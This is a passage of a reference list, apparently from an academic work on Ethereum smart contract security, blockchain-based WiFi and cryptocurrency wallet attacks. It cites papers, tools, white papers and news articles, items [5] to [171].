 [5] Ethereum daily transactions chart. https://etherscan.io/chart/tx. Accessed: 2021-01-13.
 [6] Solidity coverage. https://github.com/sc-forks/solidity-coverage. Accessed: 2021-11-12.
 [7] Waffle. https://getwaffle.io/. Accessed: 2021-11-12.
 [8] Cisco meraki for sp public wifi. http://marketo.meraki.com/rs/010-KNZ-501/images/
     Meraki_for_SP_Public_WiFi.pdf, 2019. Accessed: 2020-04-03.
 [9] Cloud managed networking. https://www.arubanetworks.com/solutions/cloud-managed/,
     2019. Accessed: 2020-04-10.
[10] Digitalocean. https://www.digitalocean.com, 2019. Accessed: 2020-04-03.
[11] Infura: Scalable blockchain infrastructure. https://github.com/INFURA, 2019. Accessed:
     2020-04-03.
[12] Passpoint. https://www.wi-fi.org/discover-wi-fi/passpoint, 2019. Accessed: 2020-04-03.
[13] Qlc chain. https://medium.com/qlc-chain/chain/home, 2019. Accessed: 2020-04-03.
[14] Ruckus cloud wi-fi.
     https://www.ruckuswireless.com/products/system-management-control/cloud-wifi, 2019.
     Accessed: 2020-04-03.
[15] Winq. https://winq.net/, 2019. Accessed: 2020-04-03.
[16] BIP-32 Protocol. https://github.com/bitcoin/bips/blob/master/bip-0032.mediawiki, 2020.
     Accessed: 2020-02-27.
[17] Ledger SAS. https://www.ledger.com, 2020. Accessed: 2020-02-27.
[18] Satoshi Labs. https://satoshilabs.com/, 2020. Accessed: 2020-02-27.
[19] ShapeShift. https://shapeshift.io, 2020. Accessed: 2020-02-27.
[20] Ethereum development documentation. https://ethereum.org/en/developers/docs/, 2021.
[21] Ethereum virtual machine opcodes. https://www.ethervm.io/, 2021.
[22] Infura. https://infura.io/, 2021.
[23] Myetherwallet. https://www.myetherwallet.com/, 2021.
[24] Pokt. https://pokt.network/, 2021.
[25] Artificial intelligence (AI) for cybersecurity.
     https://www.ibm.com/security/artificial-intelligence, 2022. Accessed: 2022-03-07.
[26] Dedaub Contract Library. https://dedaub.com/contract-library, 2022.
     Accessed: 2022-02-28.
[27] EOS.IO Technical White Paper v2.
     https://github.com/EOSIO/Documentation/blob/master/TechnicalWhitePaper.md, 2022.
     Accessed: 2022-03-07.
[28] Etherscan Token Tracker. https://etherscan.io/tokens, 2022. Accessed: 2022-03-05.
[29] Go implementation of mev-auction for ethereum. https://github.com/flashbots/mev-geth,
     2022.
[30] Miner extractable value (mev). https://ethereum.org/en/developers/docs/mev/, 2022.
[31] MythX. https://mythx.io/, 2022. Accessed: 2022-02-26.
[32] Neo White Paper. https://docs.neo.org/v2/docs/en-us/basic/whitepaper.html, 2022. Ac-
     cessed: 2022-03-07.
[33] OpenZeppelin Contracts. https://openzeppelin.com/contracts/, 2022. Accessed: 2022-02-
     28.
[34] Polygon. https://polygon.technology/, 2022.
[35] Rsk whitepaper. https://www.rsk.co/Whitepapers/RSK_White_Paper-ORIGINAL.pdf, 2022.
[36] Swc-100: Function default visibility. https://swcregistry.io/docs/SWC-100, 2022. Accessed:
     2022-03-21.
[37] Swc-107: Reentrancy. https://swcregistry.io/docs/SWC-107, 2022. Accessed: 2022-03-21.
[38] Swc-108: State variable default visibility. https://swcregistry.io/docs/SWC-108, 2022. Ac-
     cessed: 2022-03-21.
[39] Swc-119: Shadowing state variables. https://swcregistry.io/docs/SWC-119, 2022. Accessed:
     2022-04-17.
[40] Swc-123: Requirement violation. https://swcregistry.io/docs/SWC-123, 2022. Accessed:
     2022-03-10.
[41] Swc-130: Right-to-left-override control character (u+202e). https://swcregistry.io/docs/
     SWC-130, 2022. Accessed: 2022-04-17.
[42] Swc registry. https://swcregistry.io/, 2022. Accessed: 2022-03-15.
[43] Z3prover/z3. https://github.com/Z3Prover/z3, 2022.
[44] Tesnim Abdellatif and Kei-Léo Brousmiche. Formal verification of smart contracts based
     on users and blockchain behaviors models. In 2018 9th IFIP International Conference on
     New Technologies, Mobility and Security (NTMS), pages 1–5. IEEE, 2018.
[45] Lawrence Abrams. Clipboard hijacker malware monitors 2.3 million bitcoin addresses.
     https://www.bleepingcomputer.com/news/security/clipboard-hijacker-malware-monitors-23-million-bitcoin-addresses/,
     2018.
[46] Wolfgang Ahrendt, Richard Bubel, Joshua Ellul, Gordon J Pace, Raúl Pardo, Vincent Rebis-
     coul, and Gerardo Schneider. Verification of smart contract business logic. In International
     Conference on Fundamentals of Software Engineering, pages 228–243. Springer, 2019.
[47] Sefa Akca, Ajitha Rajan, and Chao Peng. Solanalyser: A framework for analysing and test-
     ing smart contracts. In 2019 26th Asia-Pacific Software Engineering Conference (APSEC),
     pages 482–489. IEEE, 2019.
[48] Elvira Albert, Jesús Correas, Pablo Gordillo, Guillermo Román-Díez, and Albert Rubio.
     Safevm: a safety verifier for ethereum smart contracts. In Proceedings of the 28th ACM
     SIGSOFT International Symposium on Software Testing and Analysis, pages 386–389, 2019.
[49] Elvira Albert, Pablo Gordillo, Albert Rubio, and Ilya Sergey. Running on fumes. In Interna-
     tional Conference on Verification and Evaluation of Computer and Communication Systems,
     pages 63–78. Springer, 2019.
[50] Emad Almutairi and Shiroq Al-Megren. Usability and security analysis of the keepkey wallet.
     In 2019 IEEE International Conference on Blockchain and Cryptocurrency (ICBC), pages
     149–153. IEEE, 2019.
[51] Sarra Alqahtani, Xinchi He, Rose Gamble, and Papa Mauricio. Formal verification of func-
     tional requirements for smart contract compositions in supply chain management systems.
     In Proceedings of the 53rd Hawaii International Conference on System Sciences, 2020.
[52] Sidney Amani, Myriam Bégel, Maksym Bortin, and Mark Staples. Towards verifying
     ethereum smart contract bytecode in isabelle/hol. In Proceedings of the 7th ACM SIGPLAN
     International Conference on Certified Programs and Proofs, pages 66–77, 2018.
[53] Elli Androulaki, Artem Barger, Vita Bortnikov, Christian Cachin, Konstantinos Christidis,
     Angelo De Caro, David Enyeart, Christopher Ferris, Gennady Laventman, Yacov Manevich,
     et al. Hyperledger fabric: a distributed operating system for permissioned blockchains. In
     Proceedings of the thirteenth EuroSys conference, pages 1–15, 2018.
[54] Pedro Antonino and AW Roscoe. Solidifier: bounded model checking solidity using lazy
     contract deployment and precise memory modelling. In ACM Symposium on Applied Com-
     puting, pages 1788–1797, 2021.
[55] Andreas M Antonopoulos and Gavin Wood. Mastering Ethereum: Building Smart Contracts
     and Dapps. O’Reilly Media, 2018.
[56] Mauro Argañaraz, Mario Berón, Maria João Pereira, and Pedro Henriques. Detection of
     vulnerabilities in smart contracts specifications in ethereum platforms. In 9th Symposium on
     Languages, Applications and Technologies (SLATE 2020), volume 83, pages 1–16. Schloss
     Dagstuhl–Leibniz-Zentrum fuer Informatik, 2020.
[57] Nicola Atzei, Massimo Bartoletti, and Tiziana Cimoli. A survey of attacks on ethereum
     smart contracts (sok). In International conference on principles of security and trust, pages
     164–186. Springer, 2017.
[58] Nicola Atzei, Massimo Bartoletti, Stefano Lande, Nobuko Yoshida, and Roberto Zunino.
     Developing secure bitcoin contracts with bitml. In Proceedings of the 2019 27th ACM Joint
     Meeting on European Software Engineering Conference and Symposium on the Foundations
     of Software Engineering, pages 1124–1128, 2019.
[59] Xiaomin Bai, Zijing Cheng, Zhangbo Duan, and Kai Hu. Formal modeling and verification
     of smart contracts. In Proceedings of the 2018 7th international conference on software and
     computer applications, pages 322–326, 2018.
[60] Massimo Bartoletti and Roberto Zunino. Verifying liquidity of bitcoin contracts. In 8th
     International Conference on Principles of Security and Trust, POST 2019 Held as Part of
     the European Joint Conferences on Theory and Practice of Software, ETAPS 2019, volume
     11426, pages 222–247. Springer, 2019.
[61] Bernhard Beckert, Mihai Herda, Michael Kirsten, and Jonas Schiffl. Formal specification
     and verification of hyperledger fabric chaincode. In Proc. Int. Conf. Formal Eng. Methods,
     pages 44–48, 2018.
[62] Matthew Beedham. This cryptocurrency stealing malware was blocked more than 360,000 times
     over the past year. https://thenextweb.com/news/cryptocurrency-malware-blocked-360000-times,
     2019. Accessed: 2021-04-12.
[63] Elisa Bertino, Murat Kantarcioglu, Cuneyt Gurcan Akcora, Sagar Samtani, Sudip Mittal,
     and Maanak Gupta. Ai for security and security for ai. In Proceedings of the Eleventh ACM
     Conference on Data and Application Security and Privacy, pages 333–334, 2021.
[64] Karthikeyan Bhargavan, Antoine Delignat-Lavaud, Cédric Fournet, Anitha Gollamudi,
     Georges Gonthier, Nadim Kobeissi, Natalia Kulatova, Aseem Rastogi, Thomas Sibut-Pinote,
     Nikhil Swamy, et al. Formal verification of smart contracts: Short paper. In Proceedings of
     the 2016 ACM workshop on programming languages and analysis for security, pages 91–96,
     2016.
[65] Giancarlo Bigi, Andrea Bracciali, Giovanni Meacci, and Emilio Tuosto. Validation of de-
     centralised smart contracts through game theory and formal methods. In Programming Lan-
     guages with Applications to Biology and Security, pages 142–161. Springer, 2015.
[66] Alex Biryukov, Dmitry Khovratovich, and Sergei Tikhomirov. Findel: Secure derivative
     contracts for ethereum. In International Conference on Financial Cryptography and Data
     Security, pages 453–467. Springer, 2017.
[67] David Bisson. Bitcoin stealer malware takes 60k using clipboard modification method.
     https://securityintelligence.com/news/bitcoin-stealer-malware-takes-60k-using-clipboard-modification-method/,
     2018.
[68] Sujit Biswas, Kashif Sharif, Fan Li, Sabita Maharjan, Saraju P Mohanty, and Yu Wang. Pobt:
     A lightweight consensus algorithm for scalable iot business blockchain. IEEE Internet of
     Things Journal, 7(3):2343–2355, 2019.
[69] Joseph Bonneau, Andrew Miller, Jeremy Clark, Arvind Narayanan, Joshua A Kroll, and Ed-
     ward W Felten. Sok: Research perspectives and challenges for bitcoin and cryptocurrencies.
     In 2015 IEEE Symposium on Security and Privacy, pages 104–121, 2015.
[70] Priyanka Bose, Dipanjan Das, Yanju Chen, Yu Feng, Christopher Kruegel, and Giovanni
     Vigna. Sailfish: Vetting smart contract state-inconsistency bugs in seconds. arXiv preprint
     arXiv:2104.08638, 2021.
[71] Sean Bowe, Alessandro Chiesa, Matthew Green, Ian Miers, Pratyush Mishra, and Howard
     Wu. Zexe: Enabling decentralized private computation. In 2020 IEEE Symposium on Secu-
     rity and Privacy (SP), pages 947–964. IEEE, 2020.
[72] Santiago Bragagnolo, Henrique Rocha, Marcus Denker, and Stéphane Ducasse. Smartin-
     spect: solidity smart contract inspector. In 2018 International workshop on blockchain ori-
     ented software engineering (IWBOSE), pages 9–18. IEEE, 2018.
[73] Lorenz Breidenbach, Phil Daian, Ari Juels, and Emin Gün Sirer. An in-depth look at the
     parity multisig bug. Hacking, Distributed, July, 2017.
[74] Lorenz Breidenbach, Phil Daian, Florian Tramèr, and Ari Juels. Enter the hydra: Towards
     principled bug bounties and exploit-resistant smart contracts. In USENIX Security 18, pages
     1335–1352, 2018.
[75] Lexi Brent, Neville Grech, Sifis Lagouvardos, Bernhard Scholz, and Yannis Smaragdakis.
     Ethainter: A smart contract security analyzer for composite vulnerabilities. In Proceedings
     of the 41st ACM SIGPLAN Conference on Programming Language Design and Implemen-
     tation, pages 454–469, 2020.
[76] Lexi Brent, Anton Jurisevic, Michael Kong, Eric Liu, Francois Gauthier, Vincent Gramoli,
     Ralph Holz, and Bernhard Scholz. Vandal: A scalable security analysis framework for smart
     contracts. arXiv preprint arXiv:1809.03981, 2018.
[77] R Browne. Accidental bug may have frozen 280 million worth of digital coin ether in a
     cryptocurrency wallet.
     https://www.cnbc.com/2017/11/08/accidental-bug-may-have-frozen-280-worth-of-ether-on-parity-wallet.html,
     2017.
[78] Vitalik Buterin. A next-generation smart contract and decentralized application platform.
     white paper, 2014.
[79] Vitalik Buterin, Eric Conner, Rick Dudley, Matthew Slipper, Ian Norden, and Abdelhamid
     Bakhta. Eip-1559: Fee market change for eth 1.0 chain. https://eips.ethereum.org/EIPS/
     eip-1559, 2019.
[80] Ramiro Camino, Christof Ferreira Torres, Mathis Baden, and Radu State. A data science
     approach for detecting honeypots in ethereum. In 2020 IEEE International Conference on
     Blockchain and Cryptocurrency (ICBC), pages 1–9. IEEE, 2020.
[81] Roberto Casado-Vara and Juan Corchado. Distributed e-health wide-world accounting
     ledger via blockchain. Journal of Intelligent & Fuzzy Systems, 36(3):2381–2386, 2019.
[82] Christian Catalini. How blockchain technology will impact the digital economy. Blockchains
     Smart Contracts Internet Things, 4:2292–2303, 2017.
[83] Ethan Cecchetti, Siqiu Yao, Haobin Ni, and Andrew C Myers. Compositional security for
     reentrant applications. contract, 12(13):14.
[84] Ethan Cecchetti, Siqiu Yao, Haobin Ni, and Andrew C Myers. Securing smart contracts
     with information flow. In International Symposium on Foundations and Applications of
     Blockchain, 2020.
[85] Ethan Cecchetti, Siqiu Yao, Haobin Ni, and Andrew C Myers. Compositional security for
     reentrant applications. arXiv preprint arXiv:2103.08577, 2021.
[86] Etherscan Information Center. How to “cancel” ethereum pending transactions?
     https://info.etherscan.com/how-to-cancel-ethereum-pending-transactions/, 2021.
[87] ChainSecurity. Zero gas price transactions — what they do, who creates them, and why they
     might impact scalability. https://tinyurl.com/4rfpafp4, 2019.
[88] S Sibi Chakkaravarthy, D Sangeetha, and V Vaidehi. A survey on malware analysis and
     mitigation techniques. Computer Science Review, 32:1–23, 2019.
[89] Jialiang Chang, Bo Gao, Hao Xiao, Jun Sun, Yan Cai, and Zijiang Yang. scompile: Critical
     path identification and analysis for smart contracts. In International Conference on Formal
     Engineering Methods, pages 286–304. Springer, 2019.
[90] Nakul Chawla, Hans Walter Behrens, Darren Tapp, Dragan Boscovic, and K Selçuk Candan.
     Velocity: Scalability improvements in block propagation through rateless erasure coding.
     In 2019 IEEE International Conference on Blockchain and Cryptocurrency (ICBC), pages
     447–454. IEEE, 2019.
 [91] Huashan Chen, Marcus Pendleton, Laurent Njilla, and Shouhuai Xu. A survey on ethereum
      systems security: Vulnerabilities, attacks, and defenses. ACM Computing Surveys (CSUR),
      53(3):1–43, 2020.
 [92] Jiachi Chen, Xin Xia, David Lo, John Grundy, Xiapu Luo, and Ting Chen. Defining smart
      contract defects on ethereum. IEEE Transactions on Software Engineering, 2020.
 [93] Jiachi Chen, Xin Xia, David Lo, John Grundy, Xiapu Luo, and Ting Chen. Defectchecker:
      Automated smart contract defect detection by analyzing evm bytecode. IEEE Transactions
      on Software Engineering, 2021.
 [94] Ting Chen, Rong Cao, Ting Li, Xiapu Luo, Guofei Gu, Yufei Zhang, Zhou Liao, Hang
      Zhu, Gang Chen, Zheyuan He, et al. Soda: A generic online detection framework for smart
      contracts. In NDSS. The Internet Society, 2020.
 [95] Ting Chen, Xiaoqi Li, Xiapu Luo, and Xiaosong Zhang. Under-optimized smart contracts
      devour your money. In 2017 IEEE 24th International Conference on Software Analysis,
      Evolution and Reengineering (SANER), pages 442–446. IEEE, 2017.
 [96] Ting Chen, Yufei Zhang, Zihao Li, Xiapu Luo, Ting Wang, Rong Cao, Xiuzhuo Xiao, and
      Xiaosong Zhang. Tokenscope: Automatically detecting inconsistent behaviors of cryptocur-
      rency tokens in ethereum. In Proc. of CCS, pages 1503–1520, 2019.
 [97] Weili Chen, Zibin Zheng, Jiahui Cui, Edith Ngai, Peilin Zheng, and Yuren Zhou. Detecting
      ponzi schemes on ethereum: Towards healthier blockchain technology. In Proceedings of
      the 2018 World Wide Web Conference, pages 1409–1418, 2018.
 [98] Raymond Cheng, Fan Zhang, Jernej Kos, Warren He, Nicholas Hynes, Noah Johnson, Ari
      Juels, Andrew Miller, and Dawn Song. Ekiden: A platform for confidentiality-preserving,
      trustworthy, and performant smart contracts. In 2019 IEEE European Symposium on Security
      and Privacy (EuroS&P), pages 185–200. IEEE, 2019.
 [99] Mung Chiang. Networked Life: 20 Questions and Answers, chapter How WiFi is different
      from cellular, pages 406–409. Cambridge University Press, 2012.
[100] Yuchiro Chinen, Naoto Yanai, Jason Paul Cruz, and Shingo Okamura. Ra: Hunting for re-
      entrancy attacks in ethereum smart contracts via static analysis. In 2020 IEEE International
      Conference on Blockchain (Blockchain), pages 327–336. IEEE, 2020.
[101] Vultr Holdings Corporation. Vultr. https://www.vultr.com, 2019. Accessed: 2020-04-03.
[102] Lorrie Faith Cranor, Serge Egelman, Jason I Hong, and Yue Zhang. Phinding phish: An
      evaluation of anti-phishing toolbars. In NDSS, pages 1–19, 2007.
[103] Xiaohai Dai, Jiang Xiao, Wenhui Yang, Chaofan Wang, and Hai Jin. Jidar: A jigsaw-like
      data reduction approach without trust assumptions for bitcoin system. In 2019 IEEE 39th
      International Conference on Distributed Computing Systems (ICDCS), pages 1317–1326.
      IEEE, 2019.
[104] Josh Datko, Chris Quartier, and Kirill Belyayev. Breaking bitcoin hardware wallets. DEF
      CON 2017, 2017.
[105] Christian Decker and Roger Wattenhofer. Information propagation in the bitcoin network.
      In IEEE P2P 2013 Proceedings, pages 1–10. IEEE, 2013.
[106] Amir Dembo, Sreeram Kannan, Ertem Nusret Tas, David Tse, Pramod Viswanath, Xuechao
      Wang, and Ofer Zeitouni. Everything is a race and nakamoto always wins. In Proceedings
      of the 2020 ACM SIGSAC Conference on Computer and Communications Security, pages
      859–878, 2020.
[107] Monika Di Angelo and Gernot Salzer. A survey of tools for analyzing ethereum smart
      contracts. In 2019 IEEE International Conference on Decentralized Applications and In-
      frastructures (DAPPCON), pages 69–78. IEEE, 2019.
[108] Mengjie Ding, Peiru Li, Shanshan Li, and He Zhang. Hfcontractfuzzer: Fuzzing hyperledger
      fabric smart contracts for vulnerability detection. In Evaluation and Assessment in Software
      Engineering, pages 321–328. 2021.
[109] Wang Duo, Huang Xin, and Ma Xiaofeng. Formal analysis of smart contract based on
      colored petri nets. IEEE Intelligent Systems, 35(3):19–30, 2020.
[110] Stefan Dziembowski, Lisa Eckey, Sebastian Faust, and Daniel Malinowski. Perun: Virtual
      payment channels over cryptographic currencies. IACR Cryptol. ePrint Arch., 2017:635,
      2017.
[111] Jacob Eberhardt and Stefan Tai. On or off the blockchain? insights on off-chaining compu-
      tation and data. In European Conference on Service-Oriented and Cloud Computing, pages
      3–15. Springer, 2017.
[112] Joshua Ellul and Gordon J Pace. Runtime verification of ethereum smart contracts. In 2018
      14th European Dependable Computing Conference (EDCC), pages 158–163. IEEE, 2018.
[113] Ethereum. Web3.js. https://web3js.readthedocs.io/en/v1.2.11/web3-eth.html, 2021.
[114] Josselin Feist, Gustavo Grieco, and Alex Groce. Slither: a static analysis framework for
      smart contracts. In 2019 IEEE/ACM 2nd International Workshop on Emerging Trends in
      Software Engineering for Blockchain (WETSEB), pages 8–15. IEEE, 2019.
[115] Yu Feng, Emina Torlak, and Rastislav Bodik. Precise attack synthesis for smart contracts.
      arXiv preprint arXiv:1902.06067, 2019.
[116] Yu Feng, Emina Torlak, and Rastislav Bodik. Summary-based symbolic evaluation for smart
      contracts. In 2020 35th IEEE/ACM International Conference on Automated Software Engi-
      neering (ASE), pages 1141–1152. IEEE, 2020.
[117] Christof Ferreira Torres, Mathis Baden, Robert Norvill, Beltran Borja Fiz Pontiveros, Hugo
      Jonker, and Sjouke Mauw. Ægis: Shielding vulnerable smart contracts against attacks. In
      Proceedings of the 15th ACM Asia Conference on Computer and Communications Security,
      pages 584–597, 2020.
[118] Christof Ferreira Torres, Ramiro Camino, et al. Frontrunner jones and the raiders of the dark
      forest: An empirical study of frontrunning on the ethereum blockchain. In USENIX Security
      Symposium, Virtual 11-13 August 2021, 2021.
[119] Christof Ferreira Torres, Antonio Ken Iannillo, Arthur Gervais, et al. Confuzzius: A data
      dependency-aware hybrid fuzzer for smart contracts. 2021.
[120] Christof Ferreira Torres, Antonio Ken Iannillo, Arthur Gervais, et al. The eye of horus:
      Spotting and analyzing attacks on ethereum smart contracts. In International Conference on
      Financial Cryptography and Data Security, Grenada 1-5 March 2021, 2021.
[121] Karoline Figueiredo, Ahmed WA Hammad, Assed Haddad, and Vivian WY Tam. Assess-
      ing the usability of blockchain for sustainability: Extending key themes to the construction
      industry. Journal of Cleaner Production, page 131047, 2022.
[122] Joel Frank, Cornelius Aschermann, and Thorsten Holz. ETHBMC: A bounded model
      checker for smart contracts. In 29th USENIX Security Symposium (USENIX Security 20),
      pages 2757–2774, 2020.
[123] Ernesto Frontera. A History of The DAO Hack. https://coinmarketcap.com/alexandria/
      article/a-history-of-the-dao-hack. Accessed: 2022-02-15.
[124] Anthony Y Fu, Xiaotie Deng, Liu Wenyin, and Greg Little. The methodology and an appli-
      cation to fight against unicode attacks. In Proceedings of the second symposium on Usable
      privacy and security, pages 91–101, 2006.
[125] Ying Fu, Meng Ren, Fuchen Ma, Yu Jiang, Heyuan Shi, and Jiaguang Sun. Evmfuzz: Dif-
      ferential fuzz testing of ethereum virtual machine. arXiv preprint arXiv:1903.08483, 2019.
[126] Ying Fu, Meng Ren, Fuchen Ma, Heyuan Shi, Xin Yang, Yu Jiang, Huizhong Li, and Xiang
      Shi. Evmfuzzer: detect evm vulnerabilities via fuzz testing. In Proceedings of the 2019 27th
      ACM Joint Meeting on European Software Engineering Conference and Symposium on the
      Foundations of Software Engineering, pages 1110–1114, 2019.
[127] Jianbo Gao, Han Liu, Chao Liu, Qingshan Li, Zhi Guan, and Zhong Chen. Easyflow: Keep
      ethereum away from overflow. In 2019 IEEE/ACM 41st International Conference on Soft-
      ware Engineering: Companion Proceedings (ICSE-Companion), pages 23–26. IEEE, 2019.
[128] Daniel E Geer Jr. Complexity is the enemy. IEEE Security & Privacy, 6(6):88–88, 2008.
[129] Serenity Gibbons. 3 practical ways to use blockchain in your business in 2020. Forbes.
[130] Yossi Gilad, Rotem Hemo, Silvio Micali, Georgios Vlachos, and Nickolai Zeldovich. Al-
      gorand: Scaling byzantine agreements for cryptocurrencies. In Proceedings of the 26th
      Symposium on Operating Systems Principles, pages 51–68, 2017.
[131] Andriana Gkaniatsou, Myrto Arapinis, and Aggelos Kiayias. Low-level attacks in bitcoin
      wallets. In International Conference on Information Security, pages 233–253. Springer,
      2017.
[132] Dan Goodin. Really stupid “smart contract” bug let hackers steal $31 million in digi-
      tal coin. https://arstechnica.com/information-technology/2021/12/hackers-drain-31-million-
      from-cryptocurrency-service-monox-finance/, 2021.
[133] Neville Grech, Michael Kong, Anton Jurisevic, Lexi Brent, Bernhard Scholz, and Yannis
      Smaragdakis. Madmax: Surviving out-of-gas conditions in ethereum smart contracts. Pro-
      ceedings of the ACM on Programming Languages, 2(OOPSLA):1–27, 2018.
[134] Gustavo Grieco, Will Song, Artur Cygan, Josselin Feist, and Alex Groce. Echidna: effective,
      usable, and fast fuzzing for smart contracts. In Proceedings of the 29th ACM SIGSOFT
      International Symposium on Software Testing and Analysis, pages 557–560, 2020.
[135] Ilya Grishchenko, Matteo Maffei, and Clara Schneidewind. Ethertrust: Sound static analysis
      of ethereum bytecode. Technische Universität Wien, Tech. Rep, 2018.
[136] Ilya Grishchenko, Matteo Maffei, and Clara Schneidewind. A semantic framework for the
      security analysis of ethereum smart contracts. In International Conference on Principles of
      Security and Trust, pages 243–269. Springer, 2018.
[137] Shelly Grossman, Ittai Abraham, Guy Golan-Gueta, Yan Michalevsky, Noam Rinetzky,
      Mooly Sagiv, and Yoni Zohar. Online detection of effectively callback free objects with
      applications to smart contracts. Proceedings of the ACM on Programming Languages,
      2(POPL):1–28, 2017.
[138] Mordechai Guri. Beatcoin: Leaking private keys from air-gapped cryptocurrency wallets.
      In 2018 IEEE International Conference on Internet of Things (iThings). IEEE, 2018.
[139] Gus Gutoski and Douglas Stebila. Hierarchical deterministic bitcoin wallets that tolerate key
      leakage. In International Conference on Financial Cryptography and Data Security, pages
      497–504. Springer, 2015.
[140] Abdelatif Hafid, Abdelhakim Senhaji Hafid, and Mustapha Samih. Scaling blockchains: A
      comprehensive survey. IEEE Access, 8:125244–125262, 2020.
[141] Ákos Hajdu and Dejan Jovanović. solc-verify: A modular verifier for solidity smart con-
      tracts. arXiv preprint arXiv:1907.04262, 2019.
[142] Ákos Hajdu, Dejan Jovanović, and Gabriela Ciocarlie. Formal specification and verification
      of solidity contracts with events (short paper). In 2nd Workshop on Formal Methods for
      Blockchains (FMBC 2020). Schloss Dagstuhl-Leibniz-Zentrum für Informatik, 2020.
[143] Qilong Han, Shuang Liang, and Hongli Zhang. Mobile cloud sensing, big data, and 5g
      networks make an intelligent and smart world. IEEE network, 29(2):40–45, 2015.
[144] Freya Sheer Hardwick, Apostolos Gioulis, Raja Naeem Akram, and Konstantinos Markan-
      tonakis. E-voting with blockchain: An e-voting protocol with decentralisation and voter
      privacy. In 2018 IEEE International Conference on Internet of Things (iThings). IEEE,
      2018.
[145] Martie G Haselton, Daniel Nettle, and Damian R Murray. The evolution of cognitive bias.
      The handbook of evolutionary psychology, pages 1–20, 2015.
[146] Jingxuan He, Mislav Balunović, Nodar Ambroladze, Petar Tsankov, and Martin Vechev.
      Learning to fuzz from symbolic execution with application to smart contracts. In Proceed-
      ings of the 2019 ACM SIGSAC Conference on Computer and Communications Security,
      pages 531–548, 2019.
[147] Ningyu He, Ruiyi Zhang, Haoyu Wang, Lei Wu, Xiapu Luo, Yao Guo, Ting Yu, and Xuxian
      Jiang. EOSAFE: Security analysis of EOSIO smart contracts. In 30th USENIX Security
      Symposium (USENIX Security 21), pages 1271–1288, 2021.
[148] Everett Hildenbrandt, Manasvi Saxena, Nishant Rodrigues, Xiaoran Zhu, Philip Daian,
      Dwight Guth, Brandon Moore, Daejun Park, Yi Zhang, Andrei Stefanescu, et al. Kevm:
      A complete formal semantics of the ethereum virtual machine. In 2018 IEEE 31st Computer
      Security Foundations Symposium (CSF), pages 204–217. IEEE, 2018.
[149] Grant Ho, Asaf Cidon, Lior Gavish, Marco Schweighauser, Vern Paxson, Stefan Savage,
      Geoffrey M Voelker, and David Wagner. Detecting and characterizing lateral phishing at
      scale. In 28th USENIX Security Symposium (USENIX Security 19), pages 1273–1290,
      2019.
[150] Tobias Holgers, David E Watson, and Steven D Gribble. Cutting through the confusion: A
      measurement study of homograph attacks. In USENIX Annual Technical Conference, pages
      261–266, 2006.
[151] Hang Hu and Gang Wang. End-to-end measurements of email spoofing attacks. In 27th
      USENIX Security Symposium (USENIX Security 18), pages 1095–1112, 2018.
[152] Teng Hu, Xiaolei Liu, Ting Chen, Xiaosong Zhang, Xiaoming Huang, Weina Niu, Jiazhong
      Lu, Kun Zhou, and Yuan Liu. Transaction-based classification and detection approach for
      ethereum smart contract. Information Processing & Management, 58(2):102462, 2021.
[153] Xinwen Hu, Yi Zhuang, Shang-Wei Lin, Fuyuan Zhang, Shuanglong Kan, and Zining Cao.
      A security type verifier for smart contracts. Computers & Security, page 102343, 2021.
[154] Jianjun Huang, Songming Han, Wei You, Wenchang Shi, Bin Liang, Jingzheng Wu, and Yan-
      jun Wu. Hunting vulnerable smart contracts via graph embedding based bytecode matching.
      IEEE Transactions on Information Forensics and Security, 16:2144–2156, 2021.
[155] Deloitte Insights. Deloitte’s 2019 global blockchain survey. Blockchain Gets Down to Busi-
      ness. Deloitte, 2019.
[156] Nikolay Ivanov, Hanqing Guo, and Qiben Yan. Rectifying administrated erc20 tokens.
      In International Conference on Information and Communications Security, pages 22–37.
      Springer, 2021.
[157] Nikolay Ivanov, Chenning Li, Qiben Yan, Zhiyuan Sun, Zhichao Cao, and Xiapu Luo. Se-
      curity threat mitigation for smart contracts: A survey, 2023.
[158] Nikolay Ivanov, Jianzhi Lou, Ting Chen, Jin Li, and Qiben Yan. Targeting the weakest link:
      Social engineering attacks in ethereum smart contracts. In Proceedings of the 2021 ACM
      Asia Conference on Computer and Communications Security, pages 787–801, 2021.
[159] Nikolay Ivanov, Jianzhi Lou, and Qiben Yan. Smart wifi: Universal and secure smart
      contract-enabled wifi hotspot. In International Conference on Security and Privacy in Com-
      munication Systems, pages 425–445. Springer, 2020.
[160] Nikolay Ivanov and Qiben Yan. Ethclipper: A clipboard meddling attack on hardware wal-
      lets with address verification evasion. In 2021 IEEE Conference on Communications and
      Network Security (CNS), pages 191–199, 2021.
[161] Nikolay Ivanov, Qiben Yan, and Anurag Kompalli. Txt: Real-time transaction encapsulation
      for ethereum smart contracts. IEEE Transactions on Information Forensics and Security,
      18:1141–1155, 2023.
[162] Nikolay Ivanov, Qiben Yan, and Qingyang Wang. Blockumulus: a scalable framework for
      smart contracts on the cloud. In 2021 IEEE 41st International Conference on Distributed
      Computing Systems (ICDCS), pages 607–617. IEEE, 2021.
[163] Bo Jiang, Ye Liu, and WK Chan. Contractfuzzer: Fuzzing smart contracts for vulnerability
      detection. In ASE. IEEE, 2018.
[164] Tigang Jiang, Hua Fang, and Honggang Wang. Blockchain-based internet of vehicles: Dis-
      tributed network architecture and performance analysis. IEEE Internet of Things Journal,
      6(3):4640–4649, 2018.
[165] Jiao Jiao, Shuanglong Kan, Shang-Wei Lin, David Sanan, Yang Liu, and Jun Sun. Semantic
      understanding of smart contracts: executable operational semantics of solidity. In 2020 IEEE
      Symposium on Security and Privacy (SP), pages 1695–1712. IEEE, 2020.
[166] Ling Jin, Yinzhi Cao, Yan Chen, Di Zhang, and Simone Campanoni. Exgen: Cross-platform,
      automated exploit generation for smart contract vulnerabilities. IEEE Transactions on De-
      pendable and Secure Computing, 2022.
[167] Harry Kalodner, Steven Goldfeder, Xiaoqi Chen, S Matthew Weinberg, and Edward W Felten.
      Arbitrum: Scalable, private smart contracts. In 27th USENIX Security Symposium
      (USENIX Security 18), pages 1353–1370, 2018.
[168] Sukrit Kalra, Seep Goel, Mohan Dhawan, and Subodh Sharma. Zeus: Analyzing safety of
      smart contracts. In NDSS, pages 1–12, 2018.
[169] Andreas Kappes, Ann H Harvey, Terry Lohrenz, P Read Montague, and Tali Sharot. Confir-
      mation bias in the utilization of others’ opinion strength. Nature neuroscience, 23(1):130–
      137, 2020.
[170] Daniel Karrenberg, Mark A. Kosters, Raymond Plzak, and Randy Bush. Root Name Server
      Operational Requirements. RFC 2870, June 2000.
[171] Jonathan Katz and Yehuda Lindell. Introduction to modern cryptography. CRC press, 2020.
